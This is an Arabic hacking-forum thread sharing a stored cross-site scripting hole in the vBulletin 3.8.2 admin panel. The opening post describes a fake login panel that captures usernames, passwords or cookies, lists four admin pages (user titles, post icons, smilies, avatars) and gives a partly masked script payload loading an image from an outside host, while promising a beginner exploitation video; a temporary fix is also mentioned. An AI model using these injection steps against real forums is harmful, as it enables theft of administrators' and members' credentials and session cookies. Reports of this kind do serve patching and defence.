ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 13

الموضوع: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

  1. #1

    افتراضي ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    بسم الله الرحمن الرحيم

    الثغرة و انا ادور لقيتها و حبيت اطرحها لعل و عسى انه نستفيد و نقفلها

    الثغره هي .. صورتين وملف هتكس .. ويقوم المهاجم بوضع رابط في اي موضوع ..

    وعند دخول اي شخص يطلع له لوحة مثل الفلتر وعند وضع الباس واليوزر ينرسل إلى ملف التكست او الكوكيز ..كود بلغة HTML:


    يعني الثغره زي Add a new title+Post Icons+post new Smilies



    .. حل الثغره ..

    تغيير مجلد الـ admincp .. ووضع جدار ناري .. ==> حل مؤقت لين ما يفرجها ربي

    و الحمدلله اتوقع الكثير مقفلين ادمن سي بي و مغيرينه يعني ما راح تكون خطيرة

    و ان شاء الله ينزل ترقيع رسمي
    كود بلغة HTML:

    vBulletin 3.8.2 adminCP Cross-Site ScriptingR.I.P DrtRp - We miss you---------------------------------------------Original Post at http://forum.aria-security.com/en/sh...p?p=1179Greetz to Aura & all Aria-Security Mods & MembersThese were all tested on vbulletin 3.8.0 RC2 so other version may be effected.1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>or any other XSS code.2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>




    بتمنى الكل استفاد
    والاستغلال للمبتدئين فيديو قريباً





    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  2. #2
    هكر متألق الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    حمودي بدال النجوم في كلمات محذوفة لازم تسوي فراغات بينها
    تحياتي الك

  3. #3

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مبدع وابداع ... الاثنين معاً

    لا اله الا الله محمد رسول الله




  4. #4
    هكر نشيط الصورة الرمزية fouade
    تاريخ التسجيل
    Oct 2012
    الدولة
    المغرب ابو الدنيا
    المشاركات
    162

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مبدع اخي تغرة لها مكانيكية xss

  5. #5

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكور يشباب وشكرا اخي عراق هكر على المعلومة
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  6. #6

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوور يا غالي

  7. #7

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوررررررررررررررررررررر ر

  8. #8

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوووووووور رائع
    Team Anony.Ha4xploit

    f.b.com/anony.ha4xploit

  9. #9

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    يسلموووووووووو

  10. #10

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكور اخي عالمرور
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. تحميل كتب احتراف استغلال xss من الصفر الى الاحتراف Cross-Site Scripting XSS Attack
    بواسطة Hidden pain في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 0
    آخر مشاركة: 09-18-2012, 09:19 PM
  2. ثغرة في منتديات الفي بي vBulletin 4.0.x
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 25
    آخر مشاركة: 07-12-2012, 11:22 PM
  3. ثغرة XSS في منتديات vBulletin 3.8.4
    بواسطة hacks في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 07-06-2012, 06:29 AM
  4. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  5. (SQL) SnapProof (cart.php) Cross Site Scripting
    بواسطة هاوي حنانك في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 03-03-2011, 08:12 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •